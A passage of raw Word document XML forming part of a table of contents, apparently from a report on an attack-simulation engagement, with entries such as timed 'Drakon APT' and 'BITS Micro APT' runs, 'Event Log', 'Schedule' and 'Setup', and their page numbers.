              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600008" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>15:14 -- TA5.2 Windows 1 -- Firefox Drakon APT Elevate Copykatz 2</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600008 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="22C7E27B" w14:textId="73AEEE45" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600009" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5.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009 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="69485D5A" w14:textId="10648853" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600010" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5.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010 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18322947" w14:textId="5F5803B0" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600011" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600011 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="57664BA1" w14:textId="559D2A84" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600012" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>15:41 -- TA5.2 Windows 1 -- Firefox BITS Micro APT</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600012 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0A703A3B" w14:textId="388C0220" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600013" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6.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013 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E769BA4" w14:textId="4064373F" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600014" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6.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014 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="773D8A83" w14:textId="4EFD45E6" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600015" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.6.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Event Log</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600015 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0EF7BCAD" w14:textId="0E493670" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="480"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600016" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>05/09/2019 – TA5.2 Attacks Day 2 and Windows Drakon APT</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600016 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="510E00B4" w14:textId="3A9985C3" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600017" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Schedule</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600017 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="213DDAA6" w14:textId="1C0A8823" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600018" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Courier New" w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Setup</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600018 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5CF9E34D" w14:textId="0C6FD550" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="960"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:bCs w:val="0"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600019" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:noProof/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>13:26 -- TA1 FiveDirections 2 -- Firefox Drakon APT Elevate Copykatz Sysinfo</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc12600019 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7991E85F" w14:textId="48C59C44" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc12600020" w:history="1">
            <w:r w:rsidR="006C1F33" w:rsidRPr="00AA328F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="majorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3.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020 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FA18DA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r w:rsidR="006C1F33">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6D8C77D3" w14:textId="40369CBE" w:rsidR="006C1F33" w:rsidRDefault="003A6F0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1200"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="24"/>
